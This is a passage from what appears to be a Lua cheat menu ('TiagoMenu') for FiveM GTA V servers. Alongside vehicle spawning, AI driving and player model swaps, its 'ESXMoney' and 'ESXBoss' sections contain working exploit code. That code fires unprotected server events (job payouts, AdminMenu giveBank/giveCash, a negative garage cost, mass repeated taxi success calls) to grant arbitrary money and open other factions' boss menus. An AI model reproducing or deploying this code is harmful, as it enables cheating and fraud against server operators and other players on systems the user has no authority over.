  7983. SetVehicleExtraColours(veh, oldpearl,
  7984. b9 = true
  7985. elseif b9 and currims == then
  7986. SetVehicleExtraColours(veh, oldpearl,
  7987. b9 = false
  7988. bb = -1
  7989. ba = -1
  7990. elseif b9 and currims ~= then
  7991. SetVehicleExtraColours(veh, oldpearl,
  7992. b9 = true
  7993. end
  7994. end
  7995. end
  7996. TiagoMenu.Display()
  7997. elseif TiagoMenu.IsMenuOpened('AICONTROLMENU') then
  7998. if TiagoMenu.Button('~h~Configure AI ~g~Speed') then
  7999. local cspeed = KeyboardInput('Enter Wanted MaxSpeed', '', 100)
  8000. if cspeed ~= nil or cspeed ~= '' then
  8001. aispeed = (cspeed .. '.0')
  8002. SetDriveTaskMaxCruiseSpeed(GetPlayerPed(-1), tonumber(aispeed))
  8003. end
  8004. SetDriverAbility(GetPlayerPed(-1), 100.0)
  8005. elseif TiagoMenu.Button('~h~AI Drive (Waypoint_Slow)') then
  8006. if DoesBlipExist(GetFirstBlipInfoId(8)) then
  8007. local blipIterator = GetBlipInfoIdIterator(8)
  8008. local blip = GetFirstBlipInfoId(8, blipIterator)
  8009. local wp = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector())
  8010. local ped = GetPlayerPed(-1)
  8011. ClearPedTasks(ped)
  8012. local v = GetVehiclePedIsIn(ped, false)
  8013. TaskVehicleDriveToCoord(ped, v, wp.x, wp.y, wp.z, tonumber(aispeed), 156, v, 5, 1.0, true)
  8014. SetDriveTaskDrivingStyle(ped, 8388636)
  8015. speedmit = true
  8016. end
  8017. elseif TiagoMenu.Button('~h~AI Drive (Waypoint_Fast)') then
  8018. if DoesBlipExist(GetFirstBlipInfoId(8)) then
  8019. local blipIterator = GetBlipInfoIdIterator(8)
  8020. local blip = GetFirstBlipInfoId(8, blipIterator)
  8021. local wp = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector())
  8022. local ped = GetPlayerPed(-1)
  8023. ClearPedTasks(ped)
  8024. local v = GetVehiclePedIsIn(ped, false)
  8025. TaskVehicleDriveToCoord(ped, v, wp.x, wp.y, wp.z, tonumber(aispeed), 156, v, 2883621, 5.5, true)
  8026. SetDriveTaskDrivingStyle(ped, 2883621)
  8027. speedmit = true
  8028. end
  8029. elseif TiagoMenu.Button('~h~AI Drive (Wander)') then
  8030. local ped = GetPlayerPed(-1)
  8031. ClearPedTasks(ped)
  8032. local v = GetVehiclePedIsIn(ped, false)
  8033. print('Configured speed is currently ' .. aispeed)
  8034. TaskVehicleDriveWander(ped, v, tonumber(aispeed), 8388636)
  8035. elseif TiagoMenu.Button('~h~Stop AI') then
  8036. speedmit = false
  8037. if IsPedInAnyVehicle(GetPlayerPed(-1)) then
  8038. ClearPedTasks(GetPlayerPed(-1))
  8039. else
  8040. ClearPedTasksImmediately(GetPlayerPed(-1))
  8041. end
  8042. end
  8044. TiagoMenu.Display()
  8045. elseif TiagoMenu.IsMenuOpened('LSC') then
  8046. veh = GetVehiclePedIsUsing(PlayerPedId())
  8047. TiagoMenu.MenuButton('~h~Exterior ~r~Tuning', 'tunings')
  8048. TiagoMenu.MenuButton('~h~Performance ~r~Tuning', 'performance')
  8050. TiagoMenu.Display()
  8051. elseif TiagoMenu.IsMenuOpened('CarTypes') then
  8052. for i, dF in ipairs(aY) do
  8053. if TiagoMenu.MenuButton('~h~~r~> ~s~' .. dF, 'CarTypeSelection') then
  8054. carTypeIdx = i
  8055. end
  8056. end
  8057. TiagoMenu.Display()
  8058. elseif TiagoMenu.IsMenuOpened('CarTypeSelection') then
  8059. for i, dF in ipairs(aZ[carTypeIdx]) do
  8060. if TiagoMenu.MenuButton('~h~~r~# ~s~' .. dF, 'CarOptions') then
  8061. carToSpawn = i
  8062. end
  8063. end
  8064. TiagoMenu.Display()
  8065. elseif TiagoMenu.IsMenuOpened('CarOptions') then
  8066. if TiagoMenu.Button('~h~~y~-Spawn intro vehicle-') then
  8067. local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
  8068. local veh = aZ[carTypeIdx][carToSpawn]
  8069. if veh == nil then
  8070. veh = 'adder'
  8071. end
  8072. vehiclehash = GetHashKey(veh)
  8073. RequestModel(vehiclehash)
  8074. Citizen.CreateThread(
  8075. function()
  8076. local dG = 0
  8077. while not HasModelLoaded(vehiclehash) do
  8078. dG = dG + 100
  8079. Citizen.Wait(100)
  8080. if dG > 5000 then
  8081. ShowNotification('~h~~r~Cannot spawn this vehicle.')
  8082. break
  8083. end
  8084. end
  8085. SpawnedCar =
  8086. CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
  8087. SetVehicleStrong(SpawnedCar, true)
  8088. SetPedIntoVehicle(PlayerPedId(), SpawnedCar, -1)
  8089. SetVehicleEngineOn(SpawnedCar, true, true, false)
  8090. SetVehicleEngineCanDegrade(SpawnedCar, false)
  8091. end
  8092. )
  8093. elseif TiagoMenu.Button('~h~~g~-Spawn vehicle-') then
  8094. local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
  8095. local veh = aZ[carTypeIdx][carToSpawn]
  8096. if veh == nil then
  8097. veh = 'adder'
  8098. end
  8099. vehiclehash = GetHashKey(veh)
  8100. RequestModel(vehiclehash)
  8101. Citizen.CreateThread(
  8102. function()
  8103. local dG = 0
  8104. while not HasModelLoaded(vehiclehash) do
  8105. dG = dG + 100
  8106. Citizen.Wait(100)
  8107. if dG > 5000 then
  8108. ShowNotification('~h~~r~Cannot spawn this vehicle.')
  8109. break
  8110. end
  8111. end
  8112. SpawnedCar =
  8113. CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
  8114. SetVehicleStrong(SpawnedCar, true)
  8115. SetVehicleEngineOn(SpawnedCar, true, true, false)
  8116. SetVehicleEngineCanDegrade(SpawnedCar, false)
  8117. end
  8118. )
  8119. end
  8121. TiagoMenu.Display()
  8122. elseif TiagoMenu.IsMenuOpened("VehBoostMenu") then
  8123. if TiagoMenu.Button('Engine Power boost ~r~RESET') then
  8124. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1.0)
  8125. elseif TiagoMenu.Button('Engine Power boost ~g~x2') then
  8126. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2.0 * 20.0)
  8127. elseif TiagoMenu.Button('Engine Power boost ~g~x4') then
  8128. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4.0 * 20.0)
  8129. elseif TiagoMenu.Button('Engine Power boost ~g~x8') then
  8130. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8.0 * 20.0)
  8131. elseif TiagoMenu.Button('Engine Power boost ~g~x16') then
  8132. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16.0 * 20.0)
  8133. elseif TiagoMenu.Button('Engine Power boost ~g~x32') then
  8134. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 32.0 * 20.0)
  8135. elseif TiagoMenu.Button('Engine Power boost ~g~x64') then
  8136. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 64.0 * 20.0)
  8137. elseif TiagoMenu.Button('Engine Power boost ~g~x128') then
  8138. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 128.0 * 20.0)
  8139. elseif TiagoMenu.Button('Engine Power boost ~g~x512') then
  8140. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 512.0 * 20.0)
  8141. elseif TiagoMenu.Button('Engine Power boost ~g~ULTIMATE') then
  8142. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5012.0 * 20.0)
  8143. end
  8145. TiagoMenu.Display()
  8146. elseif TiagoMenu.IsMenuOpened("Models") then
  8148. if TiagoMenu.ComboBox("~h~~b~Male Model", peds2, currentPedd, selectedPedd, function(currentIndex, selectedIndex)
  8149. currentPedd = currentIndex
  8150. selectedPedd = selectedIndex
  8151. end)
  8152. then
  8153. elseif TiagoMenu.Button("Selected ~b~> ") then
  8154. Deer.Destroy()
  8155. Wait(100)
  8156. local model1 = GetHashKey(peds2[selectedPedd])
  8157. local player1 = PlayerId()
  8158. local playerPed = GetPlayerPed(-1)
  8160. RequestModel(model1)
  8161. while not HasModelLoaded(model1) do
  8162. Wait(100)
  8163. end
  8165. SetPlayerModel(player1, model1)
  8166. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8167. SetModelAsNoLongerNeeded(model1)
  8168. elseif TiagoMenu.ComboBox("~h~~p~Female Model", peds3, currentPeddd, selectedPeddd, function(currentIndex, selectedIndex)
  8169. currentPeddd = currentIndex
  8170. selectedPeddd = selectedIndex
  8171. end)
  8172. then
  8173. elseif TiagoMenu.Button("Selected ~p~>") then
  8174. Deer.Destroy()
  8175. Wait(100)
  8176. local model5 = GetHashKey(peds3[selectedPeddd])
  8177. local player5 = PlayerId()
  8178. local playerPed = GetPlayerPed(-1)
  8180. RequestModel(model5)
  8181. while not HasModelLoaded(model5) do
  8182. Wait(100)
  8183. end
  8185. SetPlayerModel(player5, model5)
  8186. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8187. SetModelAsNoLongerNeeded(model5)
  8188. elseif TiagoMenu.ComboBox("~h~~o~Animal Model", peds4, currentPedddd, selectedPedddd, function(currentIndex, selectedIndex)
  8189. currentPedddd = currentIndex
  8190. selectedPedddd = selectedIndex
  8191. end)
  8192. then
  8193. elseif TiagoMenu.Button("Selected ~o~> ") then
  8194. Deer.Destroy()
  8195. Wait(100)
  8196. local model6 = GetHashKey(peds4[selectedPedddd])
  8197. local player6 = PlayerId()
  8198. local playerPed = GetPlayerPed(-1)
  8200. RequestModel(model6)
  8201. while not HasModelLoaded(model6) do
  8202. Wait(100)
  8203. end
  8205. SetPlayerModel(player6, model6)
  8206. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8207. SetModelAsNoLongerNeeded(model6)
  8208. elseif TiagoMenu.Button("Spawn ~r~Deer ~s~And Ride") then
  8209. Deer.Create()
  8210. Citizen.Wait(150)
  8211. Deer.Ride()
  8212. elseif TiagoMenu.Button("~g~Reset Model To FiveM Player") then
  8213. Deer.Destroy()
  8214. Wait(100)
  8215. local model3 = GetHashKey("mp_m_freemode_01")
  8216. local player3 = PlayerId()
  8217. local playerPed = GetPlayerPed(-1)
  8218. RequestModel(model3)
  8219. while not HasModelLoaded(model3) do
  8220. Wait(100)
  8221. end
  8223. SetPlayerModel(player3, model3)
  8224. SetPedDefaultComponentVariation(GetPlayerPed(-1))
  8225. SetModelAsNoLongerNeeded(model3)
  8226. elseif TiagoMenu.Button("Change To ~y~Trevor") then
  8227. Deer.Destroy()
  8228. Wait(100)
  8229. local model13 = GetHashKey("player_two")
  8230. local player1 = PlayerId()
  8231. local playerPed = GetPlayerPed(-1)
  8233. RequestModel(model13)
  8234. while not HasModelLoaded(model13) do
  8235. Wait(100)
  8236. end
  8238. SetPlayerModel(player1, model13)
  8239. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8240. SetModelAsNoLongerNeeded(model1)
  8241. elseif TiagoMenu.Button("Change To ~b~Michael") then
  8242. Deer.Destroy()
  8243. Wait(100)
  8244. local model12 = GetHashKey("player_zero")
  8245. local player1 = PlayerId()
  8246. local playerPed = GetPlayerPed(-1)
  8248. RequestModel(model12)
  8249. while not HasModelLoaded(model12) do
  8250. Wait(100)
  8251. end
  8253. SetPlayerModel(player1, model12)
  8254. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8255. SetModelAsNoLongerNeeded(model12)
  8256. elseif TiagoMenu.Button("Change To ~g~Franklin") then
  8257. Deer.Destroy()
  8258. Wait(100)
  8259. local model11 = GetHashKey("player_one")
  8260. local player1 = PlayerId()
  8261. local playerPed = GetPlayerPed(-1)
  8263. RequestModel(model11)
  8264. while not HasModelLoaded(model11) do
  8265. Wait(100)
  8266. end
  8268. SetPlayerModel(player1, model11)
  8269. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8270. SetModelAsNoLongerNeeded(model11)
  8271. elseif TiagoMenu.Button("Change To ~r~Alien") then
  8272. Deer.Destroy()
  8273. Wait(100)
  8274. local model121 = GetHashKey("s_m_m_movalien_01")
  8275. local player1 = PlayerId()
  8276. local playerPed = GetPlayerPed(-1)
  8278. RequestModel(model121)
  8279. while not HasModelLoaded(model121) do
  8280. Wait(100)
  8281. end
  8283. SetPlayerModel(player1, model121)
  8284. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8285. SetModelAsNoLongerNeeded(model121)
  8286. elseif TiagoMenu.Button("Change To ~h~Bigfoot") then
  8287. Deer.Destroy()
  8288. Wait(100)
  8289. local model122 = GetHashKey("ig_orleans")
  8290. local player1 = PlayerId()
  8291. local playerPed = GetPlayerPed(-1)
  8293. RequestModel(model122)
  8294. while not HasModelLoaded(model122) do
  8295. Wait(100)
  8296. end
  8298. SetPlayerModel(player1, model122)
  8299. SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
  8300. SetModelAsNoLongerNeeded(model122)
  8301. elseif TiagoMenu.Button("Change To ~p~Clown") then
  8302. local model = "s_m_y_clown_01"
  8303. RequestModel(GetHashKey(model))
  8304. Wait(500)
  8305. if HasModelLoaded(GetHashKey(model)) then
  8306. SetPlayerModel(PlayerId(), GetHashKey(model))
  8307. end
  8308. elseif TiagoMenu.Button("Change To ~r~Stripper") then
  8309. local model = "s_f_y_stripper_01"
  8310. RequestModel(GetHashKey(model))
  8311. Wait(500)
  8312. if HasModelLoaded(GetHashKey(model)) then
  8313. SetPlayerModel(PlayerId(), GetHashKey(model))
  8314. end
  8315. elseif TiagoMenu.Button("Change To ~b~Cop") then
  8316. local model = "s_m_y_cop_01"
  8317. RequestModel(GetHashKey(model))
  8318. Wait(500)
  8319. if HasModelLoaded(GetHashKey(model)) then
  8320. SetPlayerModel(PlayerId(), GetHashKey(model))
  8321. end
  8322. elseif TiagoMenu.Button("Change To ~o~Chimp") then
  8323. local model = "a_c_chimp"
  8324. RequestModel(GetHashKey(model))
  8325. Wait(500)
  8326. if HasModelLoaded(GetHashKey(model)) then
  8327. SetPlayerModel(PlayerId(), GetHashKey(model))
  8328. end
  8329. elseif TiagoMenu.Button("Change To ~g~Alien") then
  8330. local model = "s_m_m_movalien_01"
  8331. RequestModel(GetHashKey(model))
  8332. Wait(500)
  8333. if HasModelLoaded(GetHashKey(model)) then
  8334. SetPlayerModel(PlayerId(), GetHashKey(model))
  8335. end
  8336. elseif TiagoMenu.Button("Change To ~p~Pongo") then
  8337. local model = "u_m_y_pogo_01"
  8338. RequestModel(GetHashKey(model))
  8339. Wait(500)
  8340. if HasModelLoaded(GetHashKey(model)) then
  8341. SetPlayerModel(PlayerId(), GetHashKey(model))
  8342. end
  8343. elseif TiagoMenu.Button("Change To ~o~Babyd") then
  8344. local model = "u_m_y_babyd"
  8345. RequestModel(GetHashKey(model))
  8346. Wait(500)
  8347. if HasModelLoaded(GetHashKey(model)) then
  8348. SetPlayerModel(PlayerId(), GetHashKey(model))
  8349. end
  8350. elseif TiagoMenu.Button("~h~Randomize ~r~Model") then
  8351. SetPedRandomComponentVariation(PlayerPedId(), true)
  8353. elseif TiagoMenu.Button("Change Clothes (~g~ESX~s~) (NOT TESTED)") then
  8354. TriggerEvent('esx_skin:openSaveableMenu')
  8355. end
  8359. TiagoMenu.Display()
  8360. elseif TiagoMenu.IsMenuOpened("ServerMenu") then
  8361. if TiagoMenu.MenuButton("~s~Menu ~h~~r~JOBS", "RecrutarPlayers") then
  8362. elseif TiagoMenu.MenuButton("~s~Menu ~b~~h~BOSS", "ESXBoss") then
  8363. elseif TiagoMenu.MenuButton("~s~Menu ~g~~h~MONEY", "ESXMoney") then
  8364. elseif TiagoMenu.MenuButton("~s~Menu ~p~~h~DRUGS", "ESXDrugs") then
  8365. elseif TiagoMenu.MenuButton("~s~Menu ~o~~h~OTHERS", "ESXMisc") then
  8366. end
  8369. TiagoMenu.Display()
  8370. elseif TiagoMenu.IsMenuOpened("ESXBoss") then
  8371. if TiagoMenu.Button("~c~~h~Mechanic~s~ Boss Menu") then
  8372. TriggerEvent('esx_society:openBossMenu', 'mecano', function(data,menu) menu.close() end)
  8373. setMenuVisible(currentMenu, false)
  8374. elseif TiagoMenu.Button("~b~~h~Police~s~ Boss Menu") then
  8375. TriggerEvent('esx_society:openBossMenu', 'police', function(data,menu) menu.close() end)
  8376. setMenuVisible(currentMenu, false)
  8377. elseif TiagoMenu.Button("~r~~h~Ambulance~s~ Boss Menu") then
  8378. TriggerEvent('esx_society:openBossMenu', 'ambulance', function(data,menu) menu.close() end)
  8379. setMenuVisible(currentMenu, false)
  8380. elseif TiagoMenu.Button("~y~~h~Taxi~s~ Boss Menu") then
  8381. TriggerEvent('esx_society:openBossMenu', 'taxi', function(data,menu) menu.close() end)
  8382. setMenuVisible(currentMenu, false)
  8383. elseif TiagoMenu.Button("~g~~h~Real Estate~s~ Boss Menu") then
  8384. TriggerEvent('esx_society:openBossMenu', 'realestateagent', function(data,menu) menu.close() end)
  8385. setMenuVisible(currentMenu, false)
  8386. elseif TiagoMenu.Button("~p~~h~Gang~s~ Boss Menu") then
  8387. TriggerEvent('esx_society:openBossMenu', 'gang', function(data,menu) menu.close() end)
  8388. setMenuVisible(currentMenu, false)
  8389. elseif TiagoMenu.Button("~o~~h~Car Dealer~s~ Boss Menu") then
  8390. TriggerEvent('esx_society:openBossMenu', 'cardealer', function(data,menu) menu.close() end)
  8391. setMenuVisible(currentMenu, false)
  8392. elseif TiagoMenu.Button("~y~~h~Banker~s~ Boss Menu") then
  8393. TriggerEvent('esx_society:openBossMenu', 'banker', function(data,menu) menu.close() end)
  8394. setMenuVisible(currentMenu, false)
  8395. elseif TiagoMenu.Button("~c~~h~Mafia~s~ Boss Menu") then
  8396. TriggerEvent('esx_society:openBossMenu', 'mafia', function(data,menu) menu.close() end)
  8397. setMenuVisible(currentMenu, false)
  8398. elseif TiagoMenu.Button("~g~~h~ESX ~y~Custom Boss Menu") then
  8399. local result = KeyboardInput("Enter Boss Menu Script Name", "", 10)
  8400. if result then
  8401. TriggerEvent('esx_society:openBossMenu', result, function(data,menu) menu.close() end)
  8402. setMenuVisible(currentMenu, false)
  8403. end
  8404. end
  8406. TiagoMenu.Display()
  8407. elseif TiagoMenu.IsMenuOpened("ESXMoney") then
  8408. if TiagoMenu.Button("~h~~r~→ ~s~~h~ BEST MONEY ~h~~r~←") then
  8409. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8410. if result then
  8411. TriggerServerEvent('esx_truckerjob:pay', result)
  8412. TriggerServerEvent('vrp_slotmachine:server:2', result)
  8413. TriggerServerEvent("esx_pizza:pay", result)
  8414. TriggerServerEvent('esx_jobs:caution', 'give_back', result)
  8415. TriggerServerEvent('lscustoms:payGarage', result)
  8416. TriggerServerEvent('esx_tankerjob:pay', result)
  8417. TriggerServerEvent('esx_vehicletrunk:giveDirty', result)
  8418. TriggerServerEvent('f0ba1292-b68d-4d95-8823-6230cdf282b6', result)
  8419. TriggerServerEvent('gambling:spend', result)
  8420. TriggerServerEvent('265df2d8-421b-4727-b01d-b92fd6503f5e', result)
  8421. TriggerServerEvent('AdminMenu:giveDirtyMoney', result)
  8422. TriggerServerEvent('AdminMenu:giveBank', result)
  8423. TriggerServerEvent('AdminMenu:giveCash', result)
  8424. TriggerServerEvent('esx_slotmachine:sv:2', result)
  8425. TriggerServerEvent('esx_truckerjob:pay', result)
  8426. TriggerServerEvent('esx_moneywash:deposit', result)
  8427. TriggerServerEvent('esx_moneywash:withdraw', result)
  8428. TriggerServerEvent('esx_moneywash:deposit', result)
  8429. TriggerServerEvent('mission:completed', result)
  8430. TriggerServerEvent('truckerJob:success',result)
  8431. TriggerServerEvent('c65a46c5-5485-4404-bacf-06a106900258', result)
  8432. TriggerServerEvent("dropOff", result)
  8433. TriggerServerEvent('truckerfuel:success',result)
  8434. TriggerServerEvent('delivery:success',result)
  8435. TriggerServerEvent("lscustoms:payGarage", {costs = -result})
  8436. TriggerServerEvent("esx_brinksjob:pay", result)
  8437. TriggerServerEvent("esx_garbagejob:pay", result)
  8438. TriggerServerEvent("esx_postejob:pay", result)
  8439. TriggerServerEvent('KorioZ-PersonalMenu:Admin_giveCash', result)
  8441. end
  8442. elseif TiagoMenu.Button("~g~~h~MONEY ~s~1") then
  8443. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8444. if result then
  8445. TriggerServerEvent("esx_jobs:caution", "give_back", result)
  8446. end
  8447. elseif TiagoMenu.Button("~g~~h~MONEY ~s~2") then
  8448. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8449. if result then
  8450. TriggerServerEvent('esx_truckerjob:pay', result)
  8451. end
  8452. elseif TiagoMenu.Button("~g~~h~MONEY ~s~3") then
  8453. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8454. if result then
  8455. TriggerServerEvent('AdminMenu:giveBank', result)
  8456. end
  8457. elseif TiagoMenu.Button("~g~~h~MONEY ~s~4") then
  8458. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8459. if result then
  8460. TriggerServerEvent('AdminMenu:giveCash', result)
  8461. end
  8462. elseif TiagoMenu.Button("~g~~h~MONEY ~s~5") then
  8463. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8464. if result then
  8465. TriggerServerEvent("esx_gopostaljob:pay", result)
  8466. end
  8467. elseif TiagoMenu.Button("~g~~h~MONEY ~s~6") then
  8468. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8469. if result then
  8470. TriggerServerEvent("esx_banksecurity:pay", result)
  8471. end
  8472. elseif TiagoMenu.Button("~g~~h~MONEY ~s~7") then
  8473. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8474. if result then
  8475. TriggerServerEvent("esx_slotmachine:sv:2", result)
  8476. end
  8477. elseif TiagoMenu.Button("~g~~h~MONEY ~s~8") then
  8478. local result = KeyboardInput("Enter amount of money", "", 100)
  8479. if result then
  8480. TriggerServerEvent("lscustoms:payGarage", {costs = -result})
  8481. end
  8482. elseif TiagoMenu.Button("~g~~h~MONEY ~s~9") then
  8483. local result = KeyboardInput("Enter amount of money", "", 100)
  8484. if result then
  8485. TriggerServerEvent("vrp_slotmachine:server:2", result)
  8486. end
  8487. elseif TiagoMenu.Button("~g~~h~MONEY ~s~10") then
  8488. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8489. if result then
  8490. TriggerServerEvent('AdminMenu:giveDirtyMoney', result)
  8491. end
  8492. elseif TiagoMenu.Button("~g~~h~MONEY ~s~11") then
  8493. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8494. if result then
  8495. TriggerServerEvent('esx_truckerjob:pay', result)
  8496. end
  8497. elseif TiagoMenu.Button("~g~~h~MONEY ~s~12") then
  8498. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8499. if result then
  8500. TriggerServerEvent('delivery:success', result)
  8501. end
  8502. elseif TiagoMenu.Button("~g~~h~MONEY ~s~13") then
  8503. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8504. if result then
  8505. TriggerServerEvent ('taxi:success', result)
  8506. end
  8507. elseif TiagoMenu.Button("~g~~h~MONEY ~s~14") then
  8508. TriggerServerEvent('esx_pilot:success')
  8509. TriggerServerEvent('esx_taxijob:success')
  8510. TriggerServerEvent('esx_pilot:success')
  8511. TriggerServerEvent('esx_taxijob:success')
  8512. TriggerServerEvent('esx_pilot:success')
  8513. TriggerServerEvent('esx_taxijob:success')
  8514. TriggerServerEvent('esx_pilot:success')
  8515. TriggerServerEvent('esx_taxijob:success')
  8516. TriggerServerEvent('esx_pilot:success')
  8517. TriggerServerEvent('esx_taxijob:success')
  8518. TriggerServerEvent('esx_pilot:success')
  8519. TriggerServerEvent('esx_taxijob:success')
  8520. TriggerServerEvent('esx_pilot:success')
  8521. TriggerServerEvent('esx_taxijob:success')
  8522. TriggerServerEvent('esx_taxijob:success')
  8523. TriggerServerEvent('esx_taxijob:success')
  8524. TriggerServerEvent('esx_taxijob:success')
  8525. TriggerServerEvent('esx_taxijob:success')
  8526. TriggerServerEvent('esx_taxijob:success')
  8527. TriggerServerEvent('esx_taxijob:success')
  8528. TriggerServerEvent('esx_taxijob:success')
  8529. TriggerServerEvent('esx_taxijob:success')
  8530. TriggerServerEvent('esx_taxijob:success')
  8531. TriggerServerEvent('esx_taxijob:success')
  8532. TriggerServerEvent('esx_taxijob:success')
  8533. TriggerServerEvent('esx_taxijob:success')
  8534. TriggerServerEvent('esx_taxijob:success')
  8535. TriggerServerEvent('esx_taxijob:success')
  8536. TriggerServerEvent('esx_taxijob:success')
  8537. TriggerServerEvent('esx_taxijob:success')
  8538. TriggerServerEvent('esx_taxijob:success')
  8539. TriggerServerEvent('esx_taxijob:success')
  8540. TriggerServerEvent('esx_taxijob:success')
  8541. TriggerServerEvent('esx_taxijob:success')
  8542. TriggerServerEvent('esx_taxijob:success')
  8543. TriggerServerEvent('esx_taxijob:success')
  8544. TriggerServerEvent('esx_taxijob:success')
  8545. TriggerServerEvent('esx_taxijob:success')
  8546. TriggerServerEvent('esx_taxijob:success')
  8547. TriggerServerEvent('esx_taxijob:success')
  8548. TriggerServerEvent('esx_taxijob:success')
  8549. TriggerServerEvent('esx_taxijob:success')
  8550. TriggerServerEvent('esx_taxijob:success')
  8551. TriggerServerEvent('esx_taxijob:success')
  8552. TriggerServerEvent('esx_taxijob:success')
  8553. TriggerServerEvent('esx_taxijob:success')
  8554. TriggerServerEvent('esx_taxijob:success')
  8555. TriggerServerEvent('esx_taxijob:success')
  8556. TriggerServerEvent('esx_taxijob:success')
  8557. TriggerServerEvent('esx_taxijob:success')
  8558. TriggerServerEvent('esx_taxijob:success')
  8559. TriggerServerEvent('esx_taxijob:success')
  8560. TriggerServerEvent('esx_taxijob:success')
  8561. TriggerServerEvent('esx_taxijob:success')
  8562. TriggerServerEvent('esx_taxijob:success')
  8563. TriggerServerEvent('esx_taxijob:success')
  8564. TriggerServerEvent('esx_taxijob:success')
  8565. TriggerServerEvent('esx_taxijob:success')
  8566. TriggerServerEvent('esx_taxijob:success')
  8567. TriggerServerEvent('esx_taxijob:success')
  8568. TriggerServerEvent('esx_taxijob:success')
  8569. TriggerServerEvent('esx_taxijob:success')
  8570. TriggerServerEvent('esx_taxijob:success')
  8571. TriggerServerEvent('esx_taxijob:success')
  8572. TriggerServerEvent('esx_taxijob:success')
  8573. TriggerServerEvent('esx_taxijob:success')
  8574. TriggerServerEvent('esx_taxijob:success')
  8575. TriggerServerEvent('esx_taxijob:success')
  8576. TriggerServerEvent('esx_taxijob:success')
  8577. TriggerServerEvent('esx_taxijob:success')
  8578. TriggerServerEvent('esx_taxijob:success')
  8579. TriggerServerEvent('esx_taxijob:success')
  8580. TriggerServerEvent('esx_taxijob:success')
  8581. TriggerServerEvent('esx_taxijob:success')
  8582. TriggerServerEvent('esx_taxijob:success')
  8583. TriggerServerEvent('esx_taxijob:success')
  8584. TriggerServerEvent('esx_taxijob:success')
  8585. TriggerServerEvent('esx_taxijob:success')
  8586. TriggerServerEvent('esx_taxijob:success')
  8587. TriggerServerEvent('esx_taxijob:success')
  8588. TriggerServerEvent('esx_taxijob:success')
  8589. TriggerServerEvent('esx_taxijob:success')
  8590. TriggerServerEvent('esx_taxijob:success')
  8591. TriggerServerEvent('esx_taxijob:success')
  8592. TriggerServerEvent('esx_taxijob:success')
  8593. TriggerServerEvent('esx_taxijob:success')
  8594. TriggerServerEvent('esx_taxijob:success')
  8595. TriggerServerEvent('esx_taxijob:success')
  8596. TriggerServerEvent('esx_taxijob:success')
  8597. TriggerServerEvent('esx_taxijob:success')
  8598. TriggerServerEvent('esx_taxijob:success')
  8599. TriggerServerEvent('esx_taxijob:success')
  8600. TriggerServerEvent('esx_taxijob:success')
  8601. TriggerServerEvent('esx_taxijob:success')
  8602. TriggerServerEvent('esx_taxijob:success')
  8603. TriggerServerEvent('esx_taxijob:success')
  8604. TriggerServerEvent('esx_taxijob:success')
  8605. TriggerServerEvent('esx_taxijob:success')
  8606. TriggerServerEvent('esx_taxijob:success')
  8607. TriggerServerEvent('esx_taxijob:success')
  8608. TriggerServerEvent('esx_taxijob:success')
  8609. TriggerServerEvent('esx_taxijob:success')
  8610. TriggerServerEvent('esx_taxijob:success')
  8611. TriggerServerEvent('esx_taxijob:success')
  8612. TriggerServerEvent('esx_taxijob:success')
  8613. TriggerServerEvent('esx_taxijob:success')
  8614. TriggerServerEvent('esx_taxijob:success')
  8615. TriggerServerEvent('esx_taxijob:success')
  8616. TriggerServerEvent('esx_taxijob:success')
  8617. TriggerServerEvent('esx_taxijob:success')
  8618. TriggerServerEvent('esx_taxijob:success')
  8619. TriggerServerEvent('esx_taxijob:success')
  8620. TriggerServerEvent('esx_taxijob:success')
  8621. TriggerServerEvent('esx_taxijob:success')
  8622. TriggerServerEvent('esx_taxijob:success')
  8623. TriggerServerEvent('esx_taxijob:success')
  8624. TriggerServerEvent('esx_taxijob:success')
  8625. TriggerServerEvent('esx_taxijob:success')
  8626. TriggerServerEvent('esx_taxijob:success')
  8627. TriggerServerEvent('esx_taxijob:success')
  8628. elseif TiagoMenu.Button("~g~~h~MONEY ~s~15") then
  8629. local result = KeyboardInput("Enter amount of money", "", 100000000)
  8630. if result then
